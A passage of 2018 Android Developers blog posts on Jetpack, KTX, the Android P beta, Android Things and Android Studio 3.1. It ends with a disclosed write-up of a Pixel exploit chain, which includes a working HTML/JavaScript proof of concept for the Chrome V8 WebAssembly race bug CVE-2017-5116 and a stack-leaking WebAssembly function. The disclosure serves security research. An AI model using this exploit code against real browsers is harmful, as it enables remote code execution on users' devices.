      viewTreeObserver.removeOnPreDrawListener(this)
      actionToBeTriggered()
      return true
    }
});

into more concise Kotlin code like the following:

view.doOnPreDraw { actionToBeTriggered() }

This is just the first step in bringing Kotlin support to Android Jetpack components; our goal is to make Android Jetpack great for Kotlin developers (and of course Java developers!).You can read more about Android KTX on the Android Developer web site.

Getting Started

You can get started with Android Jetpack at developer.android.com/jetpack. You’ll find docs and videos for Android Jetpack, see what’s new in Android Jetpack components, participate in the community and give us feedback. We’ve also created a YouTube playlist devoted to Android Jetpack, so you can tune in for information about Android Jetpack, components, tools and best practices.

Getting Started with Android Jetpack will tell you how to bring the Android Jetpack components into your existing apps and help you get started with new Android Jetpack apps. Android Studio 3.2 has great tooling support for Android Jetpack. For building new apps, use the Activity & Fragment+ViewData activity, which you can get to from File | New | New Project in Android Studio:

What’s Next

With Android Jetpack, we’re taking the benefits of the Support Library and the Architecture Components and turning it up a notch with new components, Android Studio integration and Kotlin support. And while Android Jetpack provides the next generation components, tools and guidance to accelerate your Android development, we’ve got a lot more that we want to do and we want your help. Please go to developer.android.com/jetpack and let us know what we can do to make your experience building Android apps even better.

What’s new in Android P Beta

Android Developers May 8, 2018 Android, androidp, Beta, Featured, Preview

android P logo

Posted By Dave Burke, VP of Engineering

android P logo

Earlier today we unveiled a beta version of Android P, the next release of Android. Android P puts AI at the core of the operating system and focuses on intelligent and simple experiences. You can read more about the new user features here.

For developers, Android P beta offers a range of ways to take advantage of these new smarts, especially when it comes to increasing engagement with your apps.

You can get Android P beta on Pixel devices by enrolling here. And thanks to Project Treble, you can now get the beta on top devices from our partners as well — Essential, Nokia, Oppo, Sony, Vivo, and Xiaomi, with others on the way.

Visit android.com/beta for the full list of devices, and details on how to get Android P beta on your device. To get started developing with Android P beta, visit developer.android.com/preview.

A smarter smartphone, with machine learning at the core

Android P makes a smartphone smarter, helping it learn from and adapt to the user. Your apps can take advantage of the latest in machine intelligence to help you reach more users and offer new kinds of experiences.

Adaptive Battery

Adaptive battery in Settings

Battery is the number one priority we hear from mobile phone users, regardless of the device they are using. In Android P we’ve partnered with DeepMind on a new feature we call Adaptive Battery that optimizes how apps use battery.

Adaptive Battery uses machine learning to prioritize access to system resources for the apps the user cares about most. It puts running apps into groups with different restrictions using four new “App Standby buckets” ranging from “active” to “rare”. Apps will change buckets over time, and apps not in the “active” bucket will have restrictions in: jobs, alarms, network and high-priority Firebase Cloud Messages.

If your app is optimized for Doze, App Standby, and Background Limits, Adaptive Battery should work well for you right out of the box. We recommend testing your app in each of the four buckets. Check out the documentation for the details.

App Actions

App Actions are a new way to raise the visibility of your app to users as they start their tasks. They put your app’s core capabilities in front of users as suggestions to handle their tasks, from key touch-points across the system like the Launcher and Smart Text Selection, Google Play, Google Search app, and the Assistant.

Actions use machine learning to surface just the right apps to users based on their context or recent interactions. Because Actions highlight your app where and when it’s most relevant, they’re a great way to reach new users and re-engage with existing users.

App Actions surfacing apps in the All Apps screen.

To support App Actions, just define your app’s capabilities as semantic intents. App Actions use the same catalog of common intents as conversational Actions for the Google Assistant, which surface on voice-activated speakers, Smart displays, cars, TVs, headphones, and more. There’s no API surface needed for App Actions, so they will work on any supported Android platform version.

Actions will be available soon for developers to try, sign up here if you’d like to be notified.

Slices

Slice template example

Along with App Actions we’re introducing Slices, a new way for your apps to provide remote content to users. With Slices you can surface rich, templated UI in places like Google Search and Assistant. Slices are interactive with support for actions, toggles, sliders, scrolling content, and more.

Slice template example

Slices are a great new way to engage users and we wanted them to be available as broadly as possible. We added platform support in Android P, and we built the developer APIs and templates into Android Jetpack, our new set of libraries and tools for building great apps. Through Jetpack, your Slices implementation can target users all the way back to Kitkat — across 95% of active Android devices. We’ll also be able to update the templates regularly to support new use cases and interactions (such as text input).

Slice template example

Check out the Getting Started guide to learn how to build with Slices — you can use the SliceViewer tool to see how your Slices look. Over time we plan to expand the number of places that your Slices can appear, including remote display in other apps.

Smart reply in notifications

The Smart Reply feature in Gmail and Inbox are excellent examples of how machine intelligence can positively transform an app experience. In Android P we’ve brought Smart Replies to Notifications with an API to let you provide this optimization to your users. To make it easier to populate replies in your notifications, you’ll soon be able to use ML Kit — see developers.google.com/mlkit for details.

Text Classifier

In Android P we’ve extended the ML models that identify entities in content or text input to support more types like Dates and Flight Numbers and we’re making those improvements available to developers through the TextClassifier API. We’re also updating the Linkify API that automatically creates links to take advantage of these TextClassification models and have enriched the options the user has for quick follow on actions. Developers will have additional options of linkifying any of the entities recognized by the TextClassifier service. Smart Linkify has significant improvements in accuracy and precision of detection and performance.

Even better, the models are now updated directly from Google Play, so your apps can take advantage of model improvements using the same APIs. Once the updated models are installed, all of the entity recognition happens on-device and data is not sent over the network.

Simplicity

We put a special emphasis on simplicity in Android P, evolving Android’s UI to streamline and enhance user tasks. For developers, the changes help improve the way users find, use, and manage your apps.

New system navigation

We’re introducing a new system navigation in Android P that gives users easier access to Home, Overview, and the Assistant from a single button on every screen. The new navigation simplifies multitasking and makes discovering related apps much easier. In the Overview, users have a much larger view of what they were doing when they left each app, making it much easier to see and resume the activity. The Overview also provides access to search, predicted apps, and App Actions, and takes users to All Apps with another swipe.

New system navigation in Android P giving faster access to recents and predicted apps.

Text Magnifier

In Android P we’ve also added a new Magnifier widget, designed to make it easier to select text and manipulate the text cursor in text. By default, classes that extend TextView automatically support the magnifier, but you can use the Magnifier API to attach it to any custom View, which opens it up to a variety of uses.

Background restrictions

Battery restrictions in Android P.

We’re making it simple for users to identify and manage apps that are using battery in the background. From our work on Android Vitals, Android can detect battery-draining app behaviors such as excessive wake locks and others. Now in Android P, Battery Settings lists such apps and lets users restrict their background activities with a single tap.

When an app is restricted, its background jobs, alarms, services, and network access are affected. To stay off of the list, pay attention to your Android Vitals dashboard in the Play Console, which can help you understand performance and battery issues.

Background Restrictions ensures baseline behaviors that developers can build for across devices and manufacturers. Although device makers can add restrictions on top of the core set, they must provide user controls via Battery Settings.

We’ve added a standard API to let apps check whether they are restricted, as well as new ADB commands to let you manually apply restrictions to your apps for testing. See the documentation for details. We also plan to add restrictions related metrics to your Play Console Android Vitals dashboard in the future.

Enhanced audio with Dynamics Processing

Android P introduces a new Dynamics Processing Effect in the Audio Framework that lets developers improve audio quality. With Dynamics Processing, you can isolate specific frequencies and lower loud or increase soft sounds to enhance the acoustic quality of your application. For example, your app can improve the sound of someone who speaks quietly in a loud, distant or otherwise acoustically challenging environment.

The Dynamics Processing API gives you access to a multi-stage, multi-band dynamics processing effect that includes a pre-equalizer, a multi-band compressor, a post-equalizer and a linked limiter. It lets you modify the audio coming out of Android devices and optimize it according to the preferences of the listener or the ambient conditions. The number of bands and active stages is fully configurable, and most parameters can be controlled in realtime, such as gains, attack/release times, thresholds, etc.

To see what you can do with the Dynamics Processing Effect, please see the documentation.

Chart showing Dynamics processing levels vs standard audible levels.

Security

Biometric prompt

Biometric prompt is displayed by the system.

Android P provides a standard authentication experience across the growing range of biometric sensors. Apps can use the new BiometricPrompt API instead of displaying their own biometric auth dialogs. This new API replaces the FingerprintDialog API added in DP1. In addition to supporting Fingerprints (including in-display sensors), it also supports Face and Iris authentication, providing a system-wide consistent experience. There is a single USE_BIOMETRIC permission that covers all device-supported biometrics. FingerprintManager and the corresponding USE_FINGERPRINT permission are now deprecated, so please switch to BiometricPrompt as soon as possible.

Protected Confirmation

Android P introduces Android Protected Confirmation, which use the Trusted Execution Environment (TEE) to guarantee that a given prompt string is shown and confirmed by the user. Only after successful user confirmation will the TEE then sign the prompt string, which the app can verify.

Stronger protection for private keys

We’ve added StrongBox as a new KeyStore type, providing API support for devices that provide key storage in tamper-resistant hardware with isolated CPU, RAM, and secure flash. You can set whether your keys should be protected by a StrongBox security chip in your KeyGenParameterSpec.

Android P Beta

Bringing a new version of Android to users takes a combined effort across Google, silicon manufacturers (SM), device manufacturers (OEMs), and carriers. The process is technically challenging and can take time — to make it easier, we launched Project Treble last year as part of Android Oreo. Since then we’ve been working with partners on the initial bring-up and now we’re seeing proof of what Treble can do.

Today we announced that 6 of our top partners are joining us to release Android P Beta on their devices — Sony Xperia XZ2, Xiaomi Mi Mix 2S, Nokia 7 Plus, Oppo R15 Pro, Vivo X21UD and X21, and Essential PH‑1. We’re inviting early adopters and developers around the world to try Android P Beta on any of these devices — as well as on Pixel 2, Pixel 2 XL, Pixel, and Pixel XL.

You can see the full list of supported partner and Pixel devices at android.com/beta. For each device you’ll find specs and links to the manufacturer’s dedicated site for downloads, support, and to report issues. For Pixel devices, you can now enroll your device in the Android Beta program and automatically receive the latest Android P Beta over-the-air.

Try Android P Beta on your favorite device today and let us know your feedback! Check out our post on Faster Adoption with Project Treble for more details.

Make your apps compatible

With more users starting to get Android P Beta on their devices, now is the time to test your apps for compatibility, resolve any issues, and publish an update as soon as possible. See the migration guide for steps and a recommended timeline.

To test for compatibility, just install your current app from Google Play onto a device or emulator running Android P Beta and work through the user flows. The app should run and look great, and handle the Android P behavior changes properly. In particular, pay attention to adaptive battery, Wi-Fi permissions changes, restrictions on use of camera and sensors from the background, stricter SELinux policy for app data, and changes in TLS enabled by default, and Build.SERIAL restriction.

Compatibility through public APIs

It’s important to test your apps for uses of non-SDK interfaces. As noted previously, in Android P we’re starting a gradual process to restrict access to selected non-SDK interfaces, asking developers — including app teams inside Google — to use the public equivalents instead.

If your apps are using private Android interfaces and libraries, you should move to using public APIs from the Android SDK or NDK. The first developer preview displayed a toast warning for uses of non-SDK interfaces — starting in Android P Beta, uses of non-SDK interfaces that are not exempted will generate errors in your apps — so you’ll now get exceptions thrown instead of a warning.

To help you identify reflective usage of non-SDK APIs, we’ve added two new methods in StrictMode. You can use detectNonSdkApiUsage() to warn when your app accesses non-SDK APIs via reflection or JNI, and you can use permitNonSdkApiUsage() to suppress StrictMode warnings for those accesses. This can help you understand your app’s use of non-SDK APIs — even if the APIs are exempted at this time, it’s best to plan for the future and eliminate their use.

In cases where there is no public API that meets your use-case, please let us know immediately. We want to make sure that the initial rollout only affects interfaces where developers can easily migrate to public alternatives. More about the restrictions is here.

Test with display cutout

It’s also important to test your app with display cutout. Now you can use several of our partner devices running Android Beta to make sure your app looks its best with a display cutout. You can also use the emulated cutout support that’s available on any Android P device through Developer options.

Get started with Android P

When you’re ready, dive into Android P and learn about the many new features and APIs you can take advantage of in your apps. To make it easier to explore the new APIs, take a look at the API diff reports (API 27->DP2, DP1->DP2) along with the Android P API reference. Visit the Developer Preview site for details. Also check out this video highlighting what’s new for developers in Android P Beta.

To get started with Android P, download the P Developer Preview SDK and tools into Android Studio 3.1 or use the latest version of Android Studio 3.2. If you don’t have a device that runs Android P Beta, you can use the Android emulator to run and test your app.

As always, your feedback is critical, so please let us know what you think — the sooner we hear from you, the more of your feedback we can integrate. When you find issues, please report them here. We have separate hotlists for filing platform issues, app compatibility issues, and third-party SDK issues.

Android Things Release Candidate

Android Developers April 16, 2018 Android, Android Things, App, IoT

Posted by Dave Smith, Developer Advocate for IoT

Earlier this year at CES, we showcased consumer products powered by Android Things from partners like Lenovo, LG, JBL, iHome, and Sony. We are excited to see Android Things enable the wider developer ecosystem as well. Today we are announcing the final preview release of Android Things, Developer Preview 8, before the upcoming stable release.

Feature complete SDK

Developer Preview 8 represents the final API surface exposed in the Android Things support library for the upcoming stable release. There will be no more breaking API changes before the stable v1.0 release of the SDK. For details on all the API changes included in DP8, see the release notes. Refer to the updated SDK reference to review the classes and methods in the final SDK.

This release also brings new features in the Android Things developer console to make building and managing production devices easier. Here are some notable updates:

Production-focused console enhancements

With an eye towards building and shipping production devices with the upcoming LTS release, we have made several updates to the Android Things developer console:

  • Enhanced OTA: Unpublish the current OTA build when issues are discovered in the field.
  • Visual storage layout: Configure the device storage allocated to apps and data for each build, and get an overview of how much storage your apps require.
  • Font/locale controls: Configure the set of supported fonts and locales packaged into each build.
  • Group sharing: Product sharing has been extended to include support for Google Groups.

App library

The new app library enables you to manage APKs more easily without the need to package them together in a separate zipped bundle. Track individual versions, review permissions, and share your apps with other console users. See the app library documentation for more details.

Permissions

On mobile devices, apps request permissions at runtime and the end user grants them. In earlier previews, Android Things granted these same permissions automatically to apps on device boot. Beginning in DP8, these permissions are granted using a new interface in the developer console, giving developers more control of the permissions used by the apps on their device.

This change does not affect development, as Android Studio grants all permissions by default. Developers using the command line can append the -g flag to the adb install command to get the same behavior. To test how apps on your device behave with certain permissions revoked, use the pm command:

$ adb shell pm [grant|revoke] <permission-name> ...

App launch behavior

Embedded devices need to launch their primary application automatically after the device boots, and relaunch it if the app terminates unexpectedly. In earlier previews, the main app on the device could listen for a custom IOT_LAUNCHER intent to enable this behavior. Beginning in DP8, this category is replaced by the standard CATEGORY_HOME intent.

<activity android:name=".HomeActivity">
    ...

    <!-- Launch activity automatically on boot, relaunch on termination. -->
    <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.HOME"/>
        <category android:name="android.intent.category.DEFAULT"/>
    </intent-filter>
</activity>

Apps that contain an IOT_LAUNCHER intent filter will no longer be triggered on boot. Update your apps to use CATEGORY_HOME instead.

Feedback

Thanks to all of you in the developer community for sharing your feedback with us throughout developer preview. Join Google’s IoT Developers Community on Google+ to let us know what you’re building with Android Things and how we can improve the platform in future releases to help you build connected devices at scale!

Android Studio 3.1

Android Developers March 26, 2018 Android, Android Studio

Posted by Jamal Eason, Product Manager, Android

We are excited to announce that Android Studio 3.1 is now available to download in the stable release channel. The focus areas for this release are around product quality and app development productivity. In addition to many underlying quality changes, we added several new features into Android Studio 3.1 that you should integrate into your development flow.

New to Android Studio 3.1 is a C++ performance profiler to help troubleshoot performance bottlenecks in your app code. For those of you with a Room or SQLite database in their your app, we added better code editor support to aid in your SQL table and query creation statements. We also added better lint support for your Kotlin code, and accelerated your testing with an updated Android Emulator with Quick Boot. If any of these features sound exciting or you are looking for the next stable version of Android Studio, you should download Android Studio 3.1 today!

Check out the list of new features in Android Studio 3.1 below, organized by key developer flows.

What’s new in Android Studio 3.1

Develop

  • Kotlin Lint Checks Since announcing official Kotlin language support last year on the Android platform, we continue to invest in Kotlin language support in Android Studio. In Android Studio 3.1, we enhanced the Lint code quality checks so that now you can run them via the command line as well as from the IDE. Just open a Android Studio project, and run gradlew lint via command line. Learn more.

Kotlin Lint checks via command line

  • Database Code Editing Editing inline SQL/Room Database code in your Android project is now even easier with Android Studio 3.1. This release has SQL code completion in your @Query declarations, better SQL statement refactoring, and SQL code navigation across your project. Learn more.

Room Database code completion

  • IntelliJ Platform Update: Android Studio 3.1 includes the IntelliJ 2017.3.3 platform release, which has many new features such as new Kotlin language intentions and built-in support for SVG image preview. Learn more.

Build

  • D8 Dex Compiler D8 is now the default dex compiler in Android Studio 3.1. Replacing the legacy DX compiler, D8 dexing is an under the hood APK compilation step that makes your app size smaller, enables accurate step debugging, and many times leads to faster builds. Ensure that your gradle.properties either has no android.enableD8 flag, or if it does ensure that it is set to true. Learn more.
  • New Build Output Window – Android Studio 3.1 has an updated Build output window which organizes build status and errors in a new tree view. This change also consolidates the legacy Gradle output into this new window. Learn more.

New Build Output Window

Test

  • Quick Boot Quick Boot allows you to resume your Android Emulator session in under 6 seconds. Slow start time on the Android Emulator was a major pain point we heard from you and Quick Boot solves this issue. Like a physical Android device, the emulator must perform an initial cold boot, but subsequent starts are fast. The feature is enabled by default for all Android Virtual Devices. Additionally, in this release, you have finer grain controls of when to use Quick Boot and the ability to save the quick boot state on demand under the emulator settings page. Learn more of other top Android Emulator Features.

Quick Boot On Demand Setting

  • System Images and Frameless Device Skins – The latest version of the Android Emulator now supports the Google Play Store and Google APIs on API 24 (Nougat) – API 27 (Oreo) emulator systems images as well as the P Developer Preview. Additionally the device emulator skins are updated to work in a new frameless mode, which can help you test your app with 18:9 screen aspect ratios, or Android P Developer Preview DisplayCutout APIs. Learn more.

Window frameless mode in the Android Emulator

Optimize

  • C++ CPU Profiling Last year with Android Studio 3.0, we launched a brand new set of Android profilers to measure the CPU, Memory, and Network Activity in your app. With Android Studio 3.1, in addition to performance profiling your Kotlin and Java language app code, you can now profile your C++ code in your app. Using simpleperf as backend, the C++ profiler allows you to record C++ method traces. Learn more.

C++ CPU Profiler

  • Network Profiler Updates: Threads & Network Request To aid with analyzing network traffic in your app, we added a new Network Thread view to inspect multithreaded network traffic, and we also added a new Network Request tab to dig into the network requests over time. With these updates to the Network Profiler you will have additional tools to trace the network traffic from each thread and network request all the way down through the network call stack. Learn more.

Network Profiler with thread support

To recap, Android Studio 3.1 includes these new major features:

Develop

  • Kotlin Lint Checks
  • Database Code Editing
  • IntelliJ Platform Update

Build

  • D8 Dex Compiler
  • New Build Output Window

Test & Debug

  • Quick Boot for Android Emulator
  • API 27 with Google Play Emulator System Images
  • Window frameless mode for Android Emulator

Optimize

  • C++ Profiler
  • Network Profiler – Thread Support
  • Network Profiler – Request Support

Check out the release notes for more details.

Getting Started

Download

If you are using a previous version of Android Studio, you can upgrade to Android Studio 3.1 today or you can download the update from the official Android Studio download page.

We appreciate any feedback on things you like, issues or features you would like to see. If you find a bug or issue, feel free to file an issue. Connect with us — the Android Studio development team ‐ on our Google+ page or on Twitter.

Congratulations to the winners of the Google Play Indie Games Contest 2017 in Europe

Android Developers February 13, 2018 Android, android developers, business, competition, contest, Developer, Europe, Featured, Games, Google Play, grow, indie, Indie Contest, Indie games contest, indies, London, prizes, Saatchi, win

Posted by Adriana Puchianu, Developer Marketing Google Play

We have just wrapped up the second edition of the Google Play Indie Games Contest in Europe! The iconic Saatchi Gallery in London welcomed 20 developers, from 12 countries, who showcased their games to the audience of gamers, industry experts, and journalists.

The finalists’ games were on show to the public, who spent three hours trying out their games and voting for their favourites, alongside the Google Play team. The top 10 finalists were then selected, and went on to pitch their games, and compete for the big prizes in front of our jury.

Please join us in congratulating the winners! They will be bringing home a well-deserved diploma, along with a prize package that will help them reach more gamers worldwide; including premium placement on the Google Play Store, marketing campaigns of up to 100,000 EUR and influencer campaigns of up to 50,000 EUR, the latest Google hardware, tickets to Google I/O, and much more.

It’s really inspiring to see the excitement around this second edition, and great to see the new wave of indie games coming from Europe. We are already looking forward to playing the games that will be developed in 2018!

Check out the main winners and the other finalists on the Google Play Store!

Winner

Bury me, my love

Playdius

France

A reality-inspired interactive fiction designed for mobile phones. It tells the story of Nour, a Syrian woman trying to reach Europe in hope of a better life.

Runners up

Old Man’s Journey

Broken Rules Interactive Media GmbH

Austria

A story game about life’s precious moments, broken dreams, and changed plans.

Yellow

Bart Bonte

Belgium

A puzzle game for you! A love letter to a marvelous colour and to the little wonder called touchscreens. Warning: very yellow!

The other games that have made it into top 10 are:

Captain Tom Galactic Traveler

Picodongames

France

An open world platformer and space exploration game. Embark on an exploratory mission, discover planets, collect oxygen, play with gravity.

I Love Hue

Zut!

United Kingdom

A minimalist, ambient puzzle game influenced by mindfulness apps and abstract art. Players arrange shuffled mosaics of coloured tiles into perfectly ordered palettes.

Jodeo

Gamebra.in

Turkey

Jodeo is a 2D jelly critter. There’s something it’s curious about: what if 3D objects and 2D physics are in the same game? How can 2D objects interact with 3D objects?

Kami 2

State of Play

United Kingdom

The calming yet addictive puzzle game is back! With over 100 handcrafted puzzles, it takes you on a mind-twisting journey that combines logic and problem-solving.

Kenshō

FIFTYTWO

Russia

A tile sliding puzzle with a wonderful soundtrack. Mysterious things happen in a ruined room. Doors inside that room lead to different worlds and beautiful landscapes.

No More Buttons

Tommy Søreide Kjær

Norway

A hand-drawn platformer where the buttons are part of the environment.

The Big Journey

Catfishbox

Ukraine

Designed for kids and adults alike, this a beautiful, casual adventure. Tilt to roll around and explore a beautiful world with Mr. Whiskers.

How useful did you find this blogpost?


Introducing Android KTX: Even Sweeter Kotlin Development for Android

Android Developers February 5, 2018 Android, API, Kotlin, ktx

Posted by Jake Wharton (@JakeWharton), Florina Muntenescu (@FMuntenescu) & James Lau (@jmslau)

Today, we are announcing the preview of Android KTX – a set of extensions designed to make writing Kotlin code for Android more concise, idiomatic, and pleasant. Android KTX provides a nice API layer on top of both Android framework and Support Library to make writing your Kotlin code more natural.

The portion of Android KTX that covers the Android framework is now available in our GitHub repo. We invite you to try it out to give us your feedback and contributions. The other parts of Android KTX that cover the Android Support Library will be available in upcoming Support Library releases.

Let’s take a look at some examples of how Android KTX can help you write more natural and concise Kotlin code.

Code Samples Using Android KTX

String to Uri

Let’s start with this simple example. Normally, you’d call Uri.parse(uriString). Android KTX adds an extension function to the String class that allows you to convert strings to URIs more naturally.

Kotlin
Kotlin with Android KTX

val uri = Uri.parse(myUriString)

val uri = myUriString.toUri()

Edit SharedPreferences

Editing SharedPreferences is a very common use case. The code using Android KTX is slightly shorter and more natural to read and write.

Kotlin
Kotlin with Android KTX
sharedPreferences.edit()
           .putBoolean(key, value)
           .apply()
sharedPreferences.edit { 
    putBoolean(key, value) 
}

 

Translating path difference

In the code below, we translate the difference between two paths by 100px.

Kotlin
Kotlin with Android KTX
val pathDifference = Path(myPath1).apply {
   op(myPath2, Path.Op.DIFFERENCE)
}

val myPaint = Paint()

canvas.apply {
   val checkpoint = save()
   translate(0F, 100F)
   drawPath(pathDifference, myPaint)
   restoreToCount(checkpoint)
}


val pathDifference = myPath1 - myPath2

canvas.withTranslation(y = 100F) {
   drawPath(pathDifference, myPaint)
}

Action on View onPreDraw

This example triggers an action with a View’s onPreDraw callback. Without Android KTX, there is quite a bit of code you need to write.

Kotlin
view.viewTreeObserver.addOnPreDrawListener(
       object : ViewTreeObserver.OnPreDrawListener {
           override fun onPreDraw(): Boolean {
               viewTreeObserver.removeOnPreDrawListener(this)
               actionToBeTriggered()
               return true
           }
       })
Kotlin with Android KTX
view.doOnPreDraw { actionToBeTriggered() }

There are many more places where Android KTX can simplify your code. You can read the full API reference documentation on GitHub.

Getting Started

To start using Android KTX in your Android Kotlin projects, add the following to your app module’s build.gradle file:

repositories {
    google()
}

dependencies {
    // Android KTX for framework API
    implementation 'androidx.core:core-ktx:0.1'
    ...
}

Then, after you sync your project, the extensions appear automatically in the IDE’s auto-complete list. Selecting an extension automatically adds the necessary import statement to your file.

Beware that the APIs are likely to change during the preview period. If you decide to use it in your projects, you should expect breaking changes before we reach the stable version.

androidx: Hello World!

You may notice that Android KTX uses package names that begin with androidx. This is a new package name prefix that we will be using in future versions of Android Support Library. We hope the division between android.* and androidx.* makes it more obvious which APIs are bundled with the platform, and which are static libraries for app developers that work across different versions of Android.

What’s Next?

Today’s preview launch is only the beginning. Over the next few months, we will iterate on the API as we incorporate your feedback and contributions. When the API has stabilized and we can commit to API compatibility, we plan to release Android KTX as part of the Android Support Library.

We look forward to building Android KTX together with you. Happy Kotlin-ing!

Android Developer Story: Big Fish Games uses open beta testing to de-risk their game launch

Android Developers January 31, 2018 Android, Develop, developers, Featured, Game, Google Play, Story, Vitals

Posted by Kacey Fahey, Developer Marketing, Google Play

Based in Seattle, Big Fish Games was founded in 2002. Starting as a game studio, they quickly turned into a major publisher and distributor of casual games. Leading up to the launch of their hit time management game, Cooking Craze, the team ran an open beta on Google Play.

Big Fish Games found that using open beta provided more than 10x the amount of user feedback from around the world, and also gave them access to key metrics and Android Vitals in the Play Console. The ability to monitor game performance metrics pre-launch allowed the team to focus on areas of improvement, which lead to a 21% reduction in crash rate. The larger sample size of beta testers also provided more insights on player behavior and helped achieve a +7% improvement in day 1, day 7, and day 30 retention rates.

You can also learn more pre-launch best practices and strategies to improve performance post-launch at our Google Developer Day on Monday, March 19th at GDC. Sign up to stay informed.

How useful did you find this blogpost?

Android Security Ecosystem Investments Pay Dividends for Pixel

Android Developers January 17, 2018 Android, phone, Pixel, pwn, security

Posted by Mayank Jain and Scott Roberts of the Android Security team

In June 2017, the Android security team increased the top payouts for the Android Security Rewards (ASR) program and worked with researchers to streamline the exploit submission process. In August 2017, Guang Gong (@oldfresher) of Alpha Team, Qihoo 360 Technology Co. Ltd. submitted the first working remote exploit chain since the ASR program’s expansion. For his detailed report, Gong was awarded $105,000, which is the highest reward in the history of the ASR program and $7500 by Chrome Rewards program for a total of $112,500. The complete set of issues was resolved as part of the December 2017 monthly security update. Devices with the security patch level of 2017-12-05 or later are protected from these issues.

All Pixel devices or partner devices using A/B (seamless) system updates will automatically install these updates; users must restart their devices to complete the installation.

The Android Security team would like to thank Guang Gong and the researcher community for their contributions to Android security. If you’d like to participate in Android Security Rewards program, check out our Program rules. For tips on how to submit reports, see Bug Hunter University.

The following article is a guest blog post authored by Guang Gong of Alpha team, Qihoo 360 Technology Ltd.

Technical details of a Pixel remote exploit chain

The Pixel phone is protected by many layers of security. It was the only device that was not pwned in the 2017 Mobile Pwn2Own competition. But in August 2017, my team discovered a remote exploit chain—the first of its kind since the ASR program expansion. Thanks to the Android security team for their responsiveness and help during the submission process.

This blog post covers the technical details of the exploit chain. The exploit chain includes two bugs, CVE-2017-5116 and CVE-2017-14904. CVE-2017-5116 is a V8 engine bug that is used to get remote code execution in sandboxed Chrome render process. CVE-2017-14904 is a bug in Android’s libgralloc module that is used to escape from Chrome’s sandbox. Together, this exploit chain can be used to inject arbitrary code into system_server by accessing a malicious URL in Chrome. To reproduce the exploit, an example vulnerable environment is Chrome 60.3112.107 + Android 7.1.2 (Security patch level 2017-8-05) (google/sailfish/sailfish:7.1.2/NJH47F/4146041:user/release-keys). 

The RCE bug (CVE-2017-5116)

New features usually bring new bugs. V8 6.0 introduces support for SharedArrayBuffer, a low-level mechanism to share memory between JavaScript workers and synchronize control flow across workers. SharedArrayBuffers give JavaScript access to shared memory, atomics, and futexes. WebAssembly is a new type of code that can be run in modern web browsers— it is a low-level assembly-like language with a compact binary format that runs with near-native performance and provides languages, such as C/C++, with a compilation target so that they can run on the web. By combining the three features, SharedArrayBuffer WebAssembly, and web worker in Chrome, an OOB access can be triggered through a race condition. Simply speaking, WebAssembly code can be put into a SharedArrayBuffer and then transferred to a web worker. When the main thread parses the WebAssembly code, the worker thread can modify the code at the same time, which causes an OOB access.

The buggy code is in the function GetFirstArgumentAsBytes where the argument args may be an ArrayBuffer or TypedArray object. After SharedArrayBuffer is imported to JavaScript, a TypedArray may be backed by a SharedArraybuffer, so the content of the TypedArray may be modified by other worker threads at any time.

i::wasm::ModuleWireBytes GetFirstArgumentAsBytes(
    const v8::FunctionCallbackInfo<v8::Value>& args, ErrorThrower* thrower) {
  ......
  } else if (source->IsTypedArray()) {    //--->source should be checked if it's backed by a SharedArrayBuffer
    // A TypedArray was passed.
    Local<TypedArray> array = Local<TypedArray>::Cast(source);
    Local<ArrayBuffer> buffer = array->Buffer();
    ArrayBuffer::Contents contents = buffer->GetContents();
    start =
        reinterpret_cast<const byte*>(contents.Data()) + array->ByteOffset();
    length = array->ByteLength();
  } 
  ......
  return i::wasm::ModuleWireBytes(start, start + length);
}

A simple PoC is as follows:

<html>
<h1>poc</h1>
<script id="worker1">
worker:{
       self.onmessage = function(arg) {
        console.log("worker started");
        var ta = new Uint8Array(arg.data);
        var i =0;
        while(1){
            if(i==0){
                i=1;
                ta[51]=0;   //--->4)modify the webassembly code at the same time
            }else{
                i=0;
                ta[51]=128;
            }
        }
    }
}
</script>
<script>
function getSharedTypedArray(){
    var wasmarr = [
        0x00, 0x61, 0x73, 0x6d, 0x01, 0x00, 0x00, 0x00,
        0x01, 0x05, 0x01, 0x60, 0x00, 0x01, 0x7f, 0x03,
        0x03, 0x02, 0x00, 0x00, 0x07, 0x12, 0x01, 0x0e,
        0x67, 0x65, 0x74, 0x41, 0x6e, 0x73, 0x77, 0x65,
        0x72, 0x50, 0x6c, 0x75, 0x73, 0x31, 0x00, 0x01,
        0x0a, 0x0e, 0x02, 0x04, 0x00, 0x41, 0x2a, 0x0b,
        0x07, 0x00, 0x10, 0x00, 0x41, 0x01, 0x6a, 0x0b];
    var sb = new SharedArrayBuffer(wasmarr.length);           //---> 1)put WebAssembly code in a SharedArrayBuffer
    var sta = new Uint8Array(sb);
    for(var i=0;i<sta.length;i++)
        sta[i]=wasmarr[i];
    return sta;    
}
var blob = new Blob([
        document.querySelector('#worker1').textContent
        ], { type: "text/javascript" })

var worker = new Worker(window.URL.createObjectURL(blob));   //---> 2)create a web worker
var sta = getSharedTypedArray();
worker.postMessage(sta.buffer);                              //--->3)pass the WebAssembly code to the web worker
setTimeout(function(){
        while(1){
        try{
        sta[51]=0;
        var myModule = new WebAssembly.Module(sta);          //--->4)parse the WebAssembly code
        var myInstance = new WebAssembly.Instance(myModule);
        //myInstance.exports.getAnswerPlus1();
        }catch(e){
        }
        }
    },1000);

//worker.terminate(); 
</script>
</html>

The text format of the WebAssembly code is as follows:

00002b func[0]:
00002d: 41 2a                      | i32.const 42
00002f: 0b                         | end
000030 func[1]:
000032: 10 00                      | call 0
000034: 41 01                      | i32.const 1
000036: 6a                         | i32.add
000037: 0b                         | end

First, the above binary format WebAssembly code is put into a SharedArrayBuffer, then a TypedArray Object is created, using the SharedArrayBuffer as buffer. After that, a worker thread is created and the SharedArrayBuffer is passed to the newly created worker thread. While the main thread is parsing the WebAssembly Code, the worker thread modifies the SharedArrayBuffer at the same time. Under this circumstance, a race condition causes a TOCTOU issue. After the main thread’s bound check, the instruction ” call 0″ can be modified by the worker thread to “call 128” and then be parsed and compiled by the main thread, so an OOB access occurs.

Because the “call 0” Web Assembly instruction can be modified to call any other Web Assembly functions, the exploitation of this bug is straightforward. If “call 0” is modified to “call $leak”, registers and stack contents are dumped to Web Assembly memory. Because function 0 and function $leak have a different number of arguments, this results in many useful pieces of data in the stack being leaked.

 (func $leak(param i32 i32 i32 i32 i32 i32)(result i32)
    i32.const 0
    get_local 0
    i32.store
    i32.const 4
    get_local 1
    i32.store
    i32.const 8
    get_local 2
    i32.store
    i32.const 12
    get_local 3
    i32.store
    i32.const 16
    get_local 4
    i32.store
    i32.const 20
    get_local 5
    i32.store
    i32.const 0
  ))

